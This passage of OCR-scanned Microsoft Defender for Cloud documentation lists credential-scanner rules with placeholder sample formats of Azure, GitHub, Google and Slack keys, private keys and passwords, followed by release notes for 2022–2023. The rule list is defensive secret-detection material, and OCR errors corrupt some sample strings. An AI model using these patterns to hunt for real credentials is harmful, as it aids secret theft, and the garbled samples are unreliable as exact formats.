CDE=; 


Learn more about Batch security and compliance best practices and Create a Batch 
account with the Azure portal. 


CSCAN-AZURE0190 


Azure SignalR Access Key 


Sample: host: account.service.signalr.net; accesskey: 


abcdefghijk1lmnopgrstuvwxyz0123456789/+ABCDE=; 


Learn more about How to rotate access key for Azure SignalR Service. 


CSCAN-AZURE0200 


Azure Event Grid Access Key 


Sample: host: account.eventgrid.azure.net; accesskey: 


abcdefghijk1lmnopgqrstuvwxyz0123456789/+ABCDE=; 


Learn more about Getting access keys for Event Grid resources (articles or domains) 


CSCAN-AZURE0210 


Azure Machine Learning Web Service API Key 


Sample: host: account.azureml.net/services/01234567-abcd-abcd-abcd- 
abcdef0@12345/workspaces/@1234567-abcd-abcd-abcd-abcdef@12345/; apikey: 
abcdefghijk1lmnopgqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopgrstuvwxyz0123456789/+ABC 


DE==; 


Learn more about How to consume a Machine Learning Studio (classic) web service. 


CSCAN-AZURE0211 


Identifiable Azure Machine Learning Web Service API Key 


Sample: host: account.azureml.net/services/@1234567-abcd-abcd-abcd- 
abcdef012345/workspaces/01234567-abcd-abcd-abcd-abcdef@12345/; apikey: 
abcdefghijk1lmnopqrstuvwxyz0123456789/+ABCDEabcdefghijk1lmnopgrstuvwxyz0123456789/+ABC 


DE== 


Learn more about How to consume a Machine Learning Studio (classic) web service. 


CSCAN-AZURE0220 


Azure Cognitive Search API Key 


Sample: host: account.search.windows.net; apikey: abcdef@123456789abcdef@123456789; 


Learn more about Connecting to cognitive search using key authentication. 


CSCAN-AZURE0221 


Azure Cognitive Service Key 


Sample: cognitiveservices.azure.com...apikey= abcdef0123456789abcdef0123456789 ; 


api.cognitive.microsoft.com...apikey= abcdef0123456789abcdef0123456789 ; 


Learn more about Connecting to cognitive search using key authentication. 


CSCAN-AZURE0222 


Identifiable Azure Cognitive Search Key 


Sample: cognitiveservices.azure.com...apikey= 
abcdefghijklmnopqrstuvwxyz0123456789ABCDEFAZSeKLMNOP ; 
api.cognitive.microsoft.com...apikey= 


abcdefghijklmnopqrstuvwxyz0123456789ABCDEFAZSeKLMNOP ; 


Learn more about Connecting to cognitive search using key authentication. 


CSCAN-AZURE0230 


Azure Maps Subscription Key 


Sample: host: atlas.microsoft.com; key: abcdefghijklmnopgqrstuvwxyz0123456789-_ABCDE; 


Learn more about Managing authentication in Azure Maps. 


CSCAN-AZURE0250 


Azure Bot Framework Secret Key 


Sample: host: webchat.botframework.com/? 
s=abcdefghijk1lmnopgqrstuvwxyz .@123456789 ABCDEabcdefghijkl&... 
host: webchat.botframework.com/?s=abcdefghijk.1mn.opq.rstuvwxyz0123456789- 


_ABCDEFGHIJKLMNOPQRSTUV&... 


Learn more about Connecting a bot to Web Chat 


CSCAN-GENERALO020 


X.509 Certificate Private Key 


Sample: 9900090000000 000@ (binary certificate file: *.pfx, *.key...) 
----- BEGIN PRIVATE KEY----- MIIPuQIBAzZCCD38GCSqGSIb3DQEH... 


----- BEGIN DSA PRIVATE KEY----- MIIPUQIBAZCCD38GCSqGSIb3DQEH. . . 
SE BEGIN EC PRIVATE KEY----- 9@@@@@OOO0OO00008@ . 
----- BEGIN OPENSSH PRIVATE KEY----- MIIPuQIBAZCCD38GCSqGSIb3DQEH. .. 


certificate = "MIIPuQIBAzCCD38GCSqGSIb3DQEH..." 


Learn more about Getting started with Key Vault certificates 


CSCAN-GENERALO030 


User sign in Credentials 
Sample: { "user": "user_name", "password": "ZYXWVU_2" } 


Learn more about Setting and retrieve a secret from Azure Key Vault using the Azure 
portal. 


CSCAN-GENERALOO31 
ODBC Connection String 


Sample: data source=...;initial catalog=...;user=...;password=ZYXWVU_2; 


Learn more about Connection strings reference Z. 


CSCAN-GENERALO050 
ASP.NET Machine Key 


Sample: machineKey validationKey="ABCDEF@123456789ABCDEF@123456789ABCDEF0123456789" 


decryptionKey="ABCDEF@123456789ABCDEF0123456789ABCDEF0123456789"... 


Learn more about MachineKey Class 


CSCAN-GENERALO060 


General Password 


Sample: UserName=. . . ; Passwpod=abcdefgh0123456789/+A ==; 
tool.exe ...-u ... -p..."ZYXWVU_2"... 
<secret>ZYXWVU_3</secret> 

NetworkCredential(..., ZYXWVU_2) 


net use .../u:redmond... /p ZYXWVU_2 


schtasks.../ru ntdev.../rp ZYXWVU_2 


RemoteUserNameParameter:...;;RemotePasswordParameter : ***; ; 


Learn more about Setting and retrieving a secret from Azure Key Vault using the Azure 


portal. 


CSCAN-GENERALO070 


General Password in URL 


Sample: s://my.zoom.us/636362?pwd=ZYXWVU 


https://www.microsoft.com/?secret=ZYXWVU 


Learn more about Setting and retrieving a secret from Azure Key Vault using the Azure 


portal. 


CSCAN-GENERALO120 


Http Authorization Header 


Sample: Authorization: Basic ABCDEFGHIJKLMNOPQRS0123456789 ; 


Authorization: Digest ABCDEFGHIJKLMNOPQRS@123456789 ; 


Learn more about HttpRequestHeaders.Authorization Property. 


CSCAN-GENERALO130 


Client Secret / API Key 


Sample: client_secret=abcdefghijk1lmnopgrstuvwxyz@123456789/+ABCDE= 

ida: password=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE= 
ida:...issuer...Api...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE= 
Namespace...ACS...Issuer...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE= 
IssuerName...IssuerSecret=abcdefghijklmnopgrstuvwxyz0123456789/+ABCDE= 
App_Secret=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijk1lmnopgqrstuvwxyze123 


456789/+ABCDE== 


Learn more about The Client ID and Secret? and How and why applications are added to 
Azure AD. 


CSCAN-GENERAL0140 


General Symmetric Key 
Sample: key=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=; 


Learn more about AES Class. 


CSCAN-GENERALO150 
Ansible Vault 
Sample: $ANSIBLE_VAULT;1.1;AES256abcdefghijk1mnopqrstuvwxyz0123456789/+ABCDE... 


Learn more about Protecting sensitive data with Ansible vault £. 


CSCAN-GH0010 


GitHub Personal Access Token 


Sample: pat=ghp_abcdefghijklmnopqrstuvwxyzABCD@12345 
pat=v1.abcdef0123456789abcdef@123456789abcdefe@1 
https://user: abcdef0123456789abcdef0@123456789abcdefO1@github. com 


Learn more about Creating a personal access token”. 


CSCAN-GOOGO0010 


Google API key 
Sample: apikey=AIzaefgh@123456789_-ABCDEFGHIJKLMNOPQRS ; 


Learn more about Authentication using API keys £. 


CSCAN-MSFT0100 


Microsoft Bing Maps Key 


Sample: bingMapsKey=abcdefghijk1lmnopgrstuvwxyz@123456789- 
_ABCDEabcdefghijk1mnopgqrstu 

... bing.com/api/maps/...key=abcdefghijklmnopqrstuvwxyz0123456789- 
_ABCDEabcdefghijk1mnopaqrstu 
...dev.virtualearth.net/...key=abcdefghijklmnopqrstuvwxyz0123456789- 


_ABCDEabcdefghijk1mnopqrstu 


Learn more about Getting a Bing Maps Key. 


CSCAN-WORKO010 


Slack Access Token 


Sample: slack_token= xoxp-abcdef-abcdef-abcdef-abcdef ; 
slack_token= xoxb-abcdef-abcdef ; 
slack_token= xoxa-2-abcdef-abcdef-abcdef-abcdef ; 


slack_token= xoxr-abcdef-abcdef-abcdef-abcdef ; 


Learn more about Token types”. 


Next steps 


Overview of Defender for DevOps 


Archive for what's new in Defender for Cloud? 


Article e 09/06/2023 


The primary What's new in Defender for Cloud? release notes page contains updates for the last six 
months, while this page contains older items. 


This page provides you with information about: 


e New features 
e Bug fixes 


e Deprecated functionality 


March 2023 


Updates in March include: 


e A new Defender for Storage plan is available, including near-real time malware scanning and 
sensitive data threat detection 

e Data-aware security posture (preview) 

e Improved experience for managing the default Azure security policies 

e Defender CSPM (Cloud Security Posture Management) is now Generally Available (GA) 

e Option to create custom recommendations and security standards in Microsoft Defender for 
Cloud 

e Microsoft cloud security benchmark (MCSB) version 1.0 is now Generally Available (GA) 

e Some regulatory compliance standards are now available in government clouds 

e New preview recommendation for Azure SQL Servers 

e New alert in Defender for Key Vault 


A new Defender for Storage plan is available, including near-real 
time malware scanning and sensitive data threat detection 


Cloud storage plays a key role in the organization and stores large volumes of valuable and sensitive 
data. Today we're announcing a new Defender for Storage plan. If you're using the previous plan (now 
renamed to "Defender for Storage (classic)"), you'll need to proactively migrate to the new plan in 
order to use the new features and benefits. 


The new plan includes advanced security capabilities to help protect against malicious file uploads, 
sensitive data exfiltration, and data corruption. It also provides a more predictable and flexible pricing 
structure for better control over coverage and costs. 


The new plan has new capabilities now in public preview: 
e Detecting sensitive data exposure and exfiltration events 
e Near real-time blob on-upload malware scanning across all file types 


e Detecting entities with no identities using SAS tokens 


These capabilities enhance the existing Activity Monitoring capability, based on control and data plane 
log analysis and behavioral modeling to identify early signs of breach. 


All these capabilities are available in a new predictable and flexible pricing plan that provides granular 
control over data protection at both the subscription and resource levels. 


Learn more at Overview of Microsoft Defender for Storage. 


Data-aware security posture (preview) 


Microsoft Defender for Cloud helps security teams to be more productive at reducing risks and 
responding to data breaches in the cloud. It allows them to cut through the noise with data context 


and prioritize the most critical security risks, preventing a costly data breach. 


e Automatically discover data resources across cloud estate and evaluate their accessibility, data 
sensitivity and configured data flows. -Continuously uncover risks to data breaches of sensitive 
data resources, exposure or attack paths that could lead to a data resource using a lateral 
movement technique. 


e Detect suspicious activities that may indicate an ongoing threat to sensitive data resources. 


Learn more about data-aware security posture. 


Improved experience for managing the default Azure security 
policies 


We introduce an improved Azure security policy management experience for built-in 
recommendations that simplifies the way Defender for Cloud customers fine tune their security 
requirements. The new experience includes the following new capabilities: 


e Asimple interface allows better performance and fewer select when managing default security 
policies within Defender for Cloud, including enabling/disabling, denying, setting parameters and 
managing exemptions. 

e A single view of all built-in security recommendations offered by the Microsoft cloud security 
benchmark (formerly the Azure security benchmark). Recommendations are organized into logical 
groups, making it easier to understand the types of resources covered, and the relationship 
between parameters and recommendations. 


e New features such as filters and search have been added. 
Learn how to manage security policies. 


Read the Microsoft Defender for Cloud blog”. 


Defender CSPM (Cloud Security Posture Management) is now 
Generally Available (GA) 


We're announcing that Defender CSPM is now Generally Available (GA). Defender CSPM offers all of 
the services available under the Foundational CSPM capabilities and adds the following benefits: 


e Attack path analysis and ARG API - Attack path analysis uses a graph-based algorithm that scans 
the cloud security graph to expose attack paths and suggests recommendations as to how best 
remediate issues that break the attack path and prevent successful breach. You can also consume 
attack paths programmatically by querying Azure Resource Graph (ARG) API. Learn how to use 
attack path analysis 

e Cloud Security explorer - Use the Cloud Security Explorer to run graph-based queries on the 
cloud security graph, to proactively identify security risks in your multicloud environments. Learn 
more about cloud security explorer. 


Learn more about Defender CSPM. 


Option to create custom recommendations and security standards 
in Microsoft Defender for Cloud 


Microsoft Defender for Cloud provides the option of creating custom recommendations and standards 
for AWS and GCP using KQL queries. You can use a query editor to build and test queries over your 
data. This feature is part of the Defender CSPM (Cloud Security Posture Management) plan. Learn how 
to create custom recommendations and standards. 


Microsoft cloud security benchmark (MCSB) version 1.0 is now 
Generally Available (GA) 


Microsoft Defender for Cloud is announcing that the Microsoft cloud security benchmark (MCSB) 


version 1.0 is now Generally Available (GA). 


MCSB version 1.0 replaces the Azure Security Benchmark (ASB) version 3 as Microsoft Defender for 
Cloud's default security policy for identifying security vulnerabilities in your cloud environments 
according to common security frameworks and best practices. MCSB version 1.0 appears as the default 
compliance standard in the compliance dashboard and is enabled by default for all Defender for Cloud 


customers. 


You can also learn How Microsoft cloud security benchmark (MCSB) helps you succeed in your cloud 


security journey E. 


Learn more about MCSB Z. 


Some regulatory compliance standards are now available in 
government clouds 


We're announcing that the following regulatory standards are being updated with latest version and 
are available for customers in Azure Government and Microsoft Azure operated by 21Vianet. 


Azure Government: 


e PCI DSS v4 
e SOC 2 Type 2 
e ISO 27001:2013 


Microsoft Azure operated by 21Vianet: 


e SOC 2 Type 2 
e ISO 27001:2013 


Learn how to Customize the set of standards in your regulatory compliance dashboard. 


New preview recommendation for Azure SQL Servers 


We've added a new recommendation for Azure SQL Servers, Azure SQL Server authentication mode 


should be Azure Active Directory Only (Preview). 


The recommendation is based on the existing policy Azure SQL Database should have Azure Active 


Directory Only Authentication enabled % 


This recommendation disables local authentication methods and allows only Azure Active Directory 
Authentication, which improves security by ensuring that Azure SQL Databases can exclusively be 


accessed by Azure Active Directory identities. 


Learn how to create servers with Azure AD-only authentication enabled in Azure SQL. 


New alert in Defender for Key Vault 


Defender for Key Vault has the following new alert: 


Alert (alert type) Description MITRE Severity 
tactics 


Denied access from a suspicious An unsuccessful key vault access has been attempted Credential Low 
IP to a key vault by an IP that has been identified by Microsoft Threat Access 
(KV_Suspiciousl PAccessDenied) Intelligence as a suspicious IP address. Though this 

attempt was unsuccessful, it indicates that your 

infrastructure might have been compromised. We 

recommend further investigations. 


You can see a list of all of the alerts available for Key Vault. 


February 2023 


Updates in February include: 


e Enhanced Cloud Security Explorer 

e Defender for Containers’ vulnerability scans of running Linux images now GA 

e Announcing support for the AWS CIS 1.5.0 compliance standard 

e Microsoft Defender for DevOps (preview) is now available in other regions 

e The built-in policy [Preview]: Private endpoint should be configured for Key Vault has been 
deprecated 


Enhanced Cloud Security Explorer 


An improved version of the cloud security explorer includes a refreshed user experience that removes 
query friction dramatically, added the ability to run multicloud and multi-resource queries, and 
embedded documentation for each query option. 


The Cloud Security Explorer now allows you to run cloud-abstract queries across resources. You can 
use either the prebuilt query templates or use the custom search to apply filters to build your query. 
Learn how to manage Cloud Security Explorer. 


Defender for Containers’ vulnerability scans of running Linux 
images now GA 


Defender for Containers detects vulnerabilities in running containers. Both Windows and Linux 
containers are supported. 


In August 2022, this capability was released in preview for Windows and Linux. It's now released for 
general availability (GA) for Linux. 


When vulnerabilities are detected, Defender for Cloud generates the following security 
recommendation listing the scan's findings: Running container images should have vulnerability 
findings resolved’. 


Learn more about viewing vulnerabilities for running images. 


Announcing support for the AWS CIS 1.5.0 compliance standard 


Defender for Cloud now supports the CIS Amazon Web Services Foundations v1.5.0 compliance 
standard. The standard can be added to your Regulatory Compliance dashboard, and builds on MDC's 
existing offerings for multicloud recommendations and standards. 


This new standard includes both existing and new recommendations that extend Defender for Cloud's 
coverage to new AWS services and resources. 


Learn how to Manage AWS assessments and standards. 


Microsoft Defender for DevOps (preview) is now available in other 
regions 


Microsoft Defender for DevOps has expanded its preview and is now available in the West Europe and 
East Australia regions, when you onboard your Azure DevOps and GitHub resources. 


Learn more about Microsoft Defender for DevOps. 
The built-in policy [Preview]: Private endpoint should be 
configured for Key Vault has been deprecated 


The built-in policy [Preview]: Private endpoint should be configured for Key Vault Z has been 
deprecated and has been replaced with the [Preview]: Azure Key Vaults should use private link Z policy. 


Learn more about integrating Azure Key Vault with Azure Policy. 


January 2023 


Updates in January include: 


e The Endpoint protection (Microsoft Defender for Endpoint) component is now accessed in the 
Settings and monitoring page 

e New version of the recommendation to find missing system updates (Preview) 

e Cleanup of deleted Azure Arc machines in connected AWS and GCP accounts 

e Allow continuous export to Event Hubs behind a firewall 

e The name of the Secure score control Protect your applications with Azure advanced networking 
solutions has been changed 

e The policy Vulnerability Assessment settings for SQL server should contain an email address to 
receive scan reports has been deprecated 


e Recommendation to enable diagnostic logs for Virtual Machine Scale Sets has been deprecated 


The Endpoint protection (Microsoft Defender for Endpoint) 
component is now accessed in the Settings and monitoring page 


To access Endpoint protection, navigate to Environment settings > Defender plans > Settings and 
monitoring. From here you can set Endpoint protection to On. You can also see all of the other 
components that are managed. 


Learn more about enabling Microsoft Defender for Endpoint on your servers with Defender for Servers. 


New version of the recommendation to find missing system 
updates (Preview) 


You no longer need an agent on your Azure VMs and Azure Arc machines to make sure the machines 
have all of the latest security or critical system updates. 


The new system updates recommendation, System updates should be installed on your machines 
(powered by Azure Update Manager) in the Apply system updates control, is based on the Update 
Manager (preview). The recommendation relies on a native agent embedded in every Azure VM and 
Azure Arc machines instead of an installed agent. The Quick Fix in the new recommendation leads you 
to a one-time installation of the missing updates in the Update Manager portal. 


To use the new recommendation, you need to: 


e Connect your non-Azure machines to Arc 
e Turn on the periodic assessment property. You can use the Quick Fix in the new recommendation, 
Machines should be configured to periodically check for missing system updates to fix the 


recommendation. 


The existing "System updates should be installed on your machines" recommendation, which relies on 
the Log Analytics agent, is still available under the same control. 


Cleanup of deleted Azure Arc machines in connected AWS and GCP 
accounts 


A machine connected to an AWS and GCP account that is covered by Defender for Servers or Defender 
for SQL on machines is represented in Defender for Cloud as an Azure Arc machine. Until now, that 
machine wasn't deleted from the inventory when the machine was deleted from the AWS or GCP 
account. Leading to unnecessary Azure Arc resources left in Defender for Cloud that represents deleted 


machines. 


Defender for Cloud will now automatically delete Azure Arc machines when those machines are 
deleted in connected AWS or GCP account. 


Allow continuous export to Event Hubs behind a firewall 


You can now enable the continuous export of alerts and recommendations, as a trusted service to 
Event Hubs that are protected by an Azure firewall. 


You can enable continuous export as the alerts or recommendations are generated. You can also define 
a schedule to send periodic snapshots of all of the new data. 


Learn how to enable continuous export to an Event Hubs behind an Azure firewall. 


The name of the Secure score control Protect your applications 
with Azure advanced networking solutions has been changed 


The secure score control, Protect your applications with Azure advanced networking solutions has 


been changed to Protect applications against DDoS attacks. 


The updated name is reflected on Azure Resource Graph (ARG), Secure Score Controls API and the 


Download CSV report. 


The policy Vulnerability Assessment settings for SQL server should 
contain an email address to receive scan reports has been 
deprecated 


The policy Vulnerability Assessment settings for SQL server should contain an email address to receive 
scan reports? has been deprecated. 


The Defender for SQL vulnerability assessment email report is still available and existing email 


configurations haven't changed. 


Recommendation to enable diagnostic logs for Virtual Machine 
Scale Sets has been deprecated 


The recommendation Diagnostic logs in Virtual Machine Scale Sets should be enabled has been 


deprecated. 


The related policy definition’ has also been deprecated from any standards displayed in the 


regulatory compliance dashboard. 


Recommendation Description Severity 
Diagnostic logs in Virtual Enable logs and retain them for up to a year, enabling you to Low 
Machine Scale Sets should be recreate activity trails for investigation purposes when a security 

enabled incident occurs or your network is compromised. 


December 2022 


Updates in December include: 


e Announcing express configuration for vulnerability assessment in Defender for SQL 


Announcing express configuration for vulnerability assessment in 
Defender for SQL 


The express configuration for vulnerability assessment in Microsoft Defender for SQL provides security 
teams with a streamlined configuration experience on Azure SQL Databases and Dedicated SQL Pools 


outside of Synapse Workspaces. 
With the express configuration experience for vulnerability assessments, security teams can: 


e Complete the vulnerability assessment configuration in the security configuration of the SQL 
resource, without any another settings or dependencies on customer-managed storage accounts. 

e Immediately add scan results to baselines so that the status of the finding changes from 
Unhealthy to Healthy without rescanning a database. 

e Add multiple rules to baselines at once and use the latest scan results. 

e Enable vulnerability assessment for all Azure SQL Servers when you turn on Microsoft Defender 


for databases at the subscription-level. 


Learn more about Defender for SQL vulnerability assessment. 


November 2022 


Updates in November include: 


e Protect containers across your GCP organization with Defender for Containers 


Validate Defender for Containers protections with sample alerts 


e Governance rules at scale (Preview) 
e The ability to create custom assessments in AWS and GCP (Preview) has been deprecated 
e The recommendation to configure dead-letter queues for Lambda functions has been deprecated 


Protect containers across your GCP organization with Defender for 
Containers 


Now you can enable Defender for Containers for your GCP environment to protect standard GKE 
clusters across an entire GCP organization. Just create a new GCP connector with Defender for 
Containers enabled or enable Defender for Containers on an existing organization level GCP connector. 


Learn more about connecting GCP projects and organizations to Defender for Cloud. 


Validate Defender for Containers protections with sample alerts 


You can now create sample alerts also for Defender for Containers plan. The new sample alerts are 
presented as being from AKS, Arc-connected clusters, EKS, and GKE resources with different severities 
and MITRE tactics. You can use the sample alerts to validate security alert configurations, such as SIEM 


integrations, workflow automation, and email notifications. 


Learn more about alert validation. 


Governance rules at scale (Preview) 


We're happy to announce the new ability to apply governance rules at scale (Preview) in Defender for 
Cloud. 


With this new experience, security teams are able to define governance rules in bulk for various scopes 
(subscriptions and connectors). Security teams can accomplish this task by using management scopes 


such as Azure management groups, AWS top level accounts or GCP organizations. 


Additionally, the Governance rules (Preview) page presents all of the available governance rules that 


are effective in the organization's environments. 


Learn more about the new governance rules at-scale experience. 


© Note 


As of January 1, 2023, in order to experience the capabilities offered by Governance, you must 
have the Defender CSPM plan enabled on your subscription or connector. 


The ability to create custom assessments in AWS and GCP 
(Preview) has been deprecated 


The ability to create custom assessments for AWS accounts and GCP projects, which was a Preview 


feature, has been deprecated. 


The recommendation to configure dead-letter queues for Lambda 
functions has been deprecated 


The recommendation Lambda functions should have a dead-letter queue configured’ has been 


deprecated. 


Recommendation Description Severity 


Lambda functions This control checks whether a Lambda function is configured with a dead-letter Medium 
should have a dead- queue. The control fails if the Lambda function isn't configured with a dead- 

letter queue letter queue. As an alternative to an on-failure destination, you can configure 

configured your function with a dead-letter queue to save discarded events for further 


processing. A dead-letter queue acts the same as an on-failure destination. It's 
used when an event fails all processing attempts or expires without being 
processed. A dead-letter queue allows you to look back at errors or failed 
requests to your Lambda function to debug or identify unusual behavior. From 
a security perspective, it's important to understand why your function failed 
and to ensure that your function doesn't drop data or compromise data 
security as a result. For example, if your function can't communicate to an 
underlying resource that could be a symptom of a denial of service (DoS) 
attack elsewhere in the network. 


October 2022 


Updates in October include: 


e Announcing the Microsoft cloud security benchmark 

e Attack path analysis and contextual security capabilities in Defender for Cloud (Preview) 

e Agentless scanning for Azure and AWS machines (Preview) 

e Defender for DevOps (Preview) 

e Regulatory Compliance Dashboard now supports manual control management and detailed 
information on Microsoft's compliance status 

e Auto-provisioning has been renamed to Settings & monitoring and has an updated experience 

e Defender Cloud Security Posture Management (CSPM) (Preview) 

e MITRE ATT&CK framework mapping is now available also for AWS and GCP security 
recommendations 

e Defender for Containers now supports vulnerability assessment for Elastic Container Registry 


(Preview) 


Announcing the Microsoft cloud security benchmark 


The Microsoft cloud security benchmark (MCSB) is a new framework defining fundamental cloud 
security principles based on common industry standards and compliance frameworks. Together with 
detailed technical guidance for implementing these best practices across cloud platforms. MCSB is 
replacing the Azure Security Benchmark. MCSB provides prescriptive details for how to implement its 
cloud-agnostic security recommendations on multiple cloud service platforms, initially covering Azure 
and AWS. 


You can now monitor your cloud security compliance posture per cloud in a single, integrated 
dashboard. You can see MCSB as the default compliance standard when you navigate to Defender for 
Cloud's regulatory compliance dashboard. 


Microsoft cloud security benchmark is automatically assigned to your Azure subscriptions and AWS 
accounts when you onboard Defender for Cloud. 


Learn more about the Microsoft cloud security benchmark. 


Attack path analysis and contextual security capabilities in 
Defender for Cloud (Preview) 


The new cloud security graph, attack path analysis and contextual cloud security capabilities are now 
available in Defender for Cloud in preview. 


One of the biggest challenges that security teams face today is the number of security issues they face 
on a daily basis. There are numerous security issues that need to be resolved and never enough 
resources to address them all. 


Defender for Cloud's new cloud security graph and attack path analysis capabilities gives security 
teams the ability to assess the risk behind each security issue. Security teams can also identify the 
highest risk issues that need to be resolved soonest. Defender for Cloud works with security teams to 
reduce the risk of an affectful breach to their environment in the most effective way. 


Learn more about the new cloud security graph, attack path analysis, and the cloud security explorer. 


Agentless scanning for Azure and AWS machines (Preview) 


Until now, Defender for Cloud based its posture assessments for VMs on agent-based solutions. To 
help customers maximize coverage and reduce onboarding and management friction, we're releasing 


agentless scanning for VMs to preview. 


With agentless scanning for VMs, you get wide visibility on installed software and software CVEs. You 
get the visibility without the challenges of agent installation and maintenance, network connectivity 
requirements, and performance affect on your workloads. The analysis is powered by Microsoft 
Defender vulnerability management. 


Agentless vulnerability scanning is available in both Defender Cloud Security Posture Management 
(CSPM) and in Defender for Servers P2, with native support for AWS and Azure VMs. 


e Learn more about agentless scanning. 
e Find out how to enable agentless vulnerability assessment. 


Defender for DevOps (Preview) 


Microsoft Defender for Cloud enables comprehensive visibility, posture management, and threat 
protection across hybrid and multicloud environments including Azure, AWS, Google, and on-premises 
resources. 


Now, the new Defender for DevOps plan integrates source code management systems, like GitHub and 
Azure DevOps, into Defender for Cloud. With this new integration, we're empowering security teams to 
protect their resources from code to cloud. 


Defender for DevOps allows you to gain visibility into and manage your connected developer 
environments and code resources. Currently, you can connect Azure DevOps and GitHub systems to 
Defender for Cloud and onboard DevOps repositories to Inventory and the new DevOps Security page. 
It provides security teams with a high-level overview of the discovered security issues that exist within 
them in a unified DevOps Security page. 


Security teams can now configure pull request annotations to help developers address secret scanning 


findings in Azure DevOps directly on their pull requests. 


You can configure the Microsoft Security DevOps tools on Azure Pipelines and GitHub workflows to 


enable the following security scans: 


Name Language License 
Bandit £ Python Apache 
License 2.0 7 
BinSkim Z Binary — Windows, ELF MIT License Z 
ESlint Z JavaScript MIT License Z 
CredScan E Credential Scanner (also known as CredScan) is a tool developed and Not Open 
(Azure DevOps maintained by Microsoft to identify credential leaks such as those in source Source 


Only) 


code and configuration files common types: default passwords, SQL connection 


strings, Certificates with private keys 


Template 
Analyze E 


Terrascan E 


Trivy Z 


ARM template, Bicep file 


Terraform (HCL2), Kubernetes USON/YAML), Helm v3, Kustomize, Dockerrfiles, 
Cloud Formation 


Container images, file systems, git repositories 


MIT License £ 


Apache 
License 2.0% 


Apache 
License 2.0% 


The following new recommendations are now available for DevOps: 


Recommendation 


(Preview) Code 
repositories should have 
code scanning findings 
resolved Z 


(Preview) Code 
repositories should have 
secret scanning findings 
resolved 4 


(Preview) Code 
repositories should have 
Dependabot scanning 
findings resolved b 


(Preview) Code 
repositories should have 
infrastructure as code 
scanning findings 
resolved č 


Description Severity 


Defender for DevOps has found vulnerabilities in code repositories. To Medium 
improve the security posture of the repositories, it's highly recommended 


to remediate these vulnerabilities. (No related policy) 


Defender for DevOps has found a secret in code repositories. This should High 
be remediated immediately to prevent a security breach. Secrets found in 
repositories can be leaked or discovered by adversaries, leading to 

compromise of an application or service. For Azure DevOps, the Microsoft 

Security DevOps CredScan tool only scans builds on which it has been 

configured to run. Therefore, results may not reflect the complete status of 


secrets in your repositories. (No related policy) 


Defender for DevOps has found vulnerabilities in code repositories. To Medium 
improve the security posture of the repositories, it's highly recommended 


to remediate these vulnerabilities. (No related policy) 


(Preview) Code repositories should have infrastructure as code scanning Medium 


findings resolved 


Recommendation Description Severity 


(Preview) GitHub GitHub uses code scanning to analyze code in order to find security Medium 
repositories should have vulnerabilities and errors in code. Code scanning can be used to find, 
code scanning enabled triage, and prioritize fixes for existing problems in your code. Code 

scanning can also prevent developers from introducing new problems. 

Scans can be scheduled for specific days and times, or scans can be 

triggered when a specific event occurs in the repository, such as a push. If 

code scanning finds a potential vulnerability or error in code, GitHub 

displays an alert in the repository. A vulnerability is a problem in a project's 

code that could be exploited to damage the confidentiality, integrity, or 

availability of the project. (No related policy) 


(Preview) GitHub GitHub scans repositories for known types of secrets, to prevent fraudulent High 
repositories should have use of secrets that were accidentally committed to repositories. Secret 
secret scanning enabled? scanning will scan the entire Git history on all branches present in the 

GitHub repository for any secrets. Examples of secrets are tokens and 

private keys that a service provider can issue for authentication. If a secret 

is checked into a repository, anyone who has read access to the repository 

can use the secret to access the external service with those privileges. 

Secrets should be stored in a dedicated, secure location outside the 

repository for the project. (No related policy) 


(Preview) GitHub GitHub sends Dependabot alerts when it detects vulnerabilities in code Medium 
repositories should have dependencies that affect repositories. A vulnerability is a problem in a 

Dependabot scanning project's code that could be exploited to damage the confidentiality, 

enabled ¢ integrity, or availability of the project or other projects that use its code. 


Vulnerabilities vary in type, severity, and method of attack. When code 
depends on a package that has a security vulnerability, this vulnerable 
dependency can cause a range of problems. (No related policy) 


The Defender for DevOps recommendations replaced the deprecated vulnerability scanner for CI/CD 
workflows that was included in Defender for Containers. 


Learn more about Defender for DevOps 


Regulatory Compliance dashboard now supports manual control 
management and detailed information on Microsoft's compliance 
status 


The compliance dashboard in Defender for Cloud is a key tool for customers to help them understand 
and track their compliance status. Customers can continuously monitor environments in accordance 


with requirements from many different standards and regulations. 


Now, you can fully manage your compliance posture by manually attesting to operational and non- 
technical controls. You can now provide evidence of compliance for controls that aren't automated. 
Together with the automated assessments, you can now generate a full report of compliance within a 


selected scope, addressing the entire set of controls for a given standard. 


In addition, with richer control information and in-depth details and evidence for Microsoft's 
compliance status, you now have all of the information required for audits at your fingertips. 


Some of the new benefits include: 


e Manual customer actions provide a mechanism for manually attesting compliance with non- 
automated controls. Including the ability to link evidence, set a compliance date and expiration 
date. 


e Richer control details for supported standards that showcase Microsoft actions and manual 
customer actions in addition to the already existing automated customer actions. 


e Microsoft actions provide transparency into Microsoft's compliance status that includes audit 


assessment procedures, test results, and Microsoft responses to deviations. 


e Compliance offerings provide a central location to check Azure, Dynamics 365, and Power 


Platform products and their respective regulatory compliance certifications. 


Learn more on how to Improve your regulatory compliance with Defender for Cloud. 


Auto-provisioning has been renamed to Settings & monitoring and 
has an updated experience 


We've renamed the Auto-provisioning page to Settings & monitoring. 


Auto-provisioning was meant to allow at-scale enablement of prerequisites, which are needed by 
Defender for Cloud's advanced features and capabilities. To better support our expanded capabilities, 


we're launching a new experience with the following changes: 
The Defender for Cloud's plans page now includes: 


e When you enable a Defender plan that requires monitoring components, those components are 
enabled for automatic provisioning with default settings. These settings can optionally be edited 
at any time. 

e You can access the monitoring component settings for each Defender plan from the Defender 
plan page. 

e The Defender plans page clearly indicates whether all the monitoring components are in place for 
each Defender plan, or if your monitoring coverage is incomplete. 


The Settings & monitoring page: 
e Each monitoring component indicates the Defender plans to which it's related. 


Learn more about managing your monitoring settings. 


Defender Cloud Security Posture Management (CSPM) 


One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security Posture 
Management (CSPM). CSPM provides you with hardening guidance that helps you efficiently and 
effectively improve your security. CSPM also gives you visibility into your current security situation. 


We're announcing a new Defender plan: Defender CSPM. This plan enhances the security capabilities of 


Defender for Cloud and includes the following new and expanded features: 


e Continuous assessment of the security configuration of your cloud resources 


e Security recommendations to fix misconfigurations and weaknesses 
e Secure score 

e Governance 

e Regulatory compliance 

e Cloud security graph 

e Attack path analysis 

e Agentless scanning for machines 


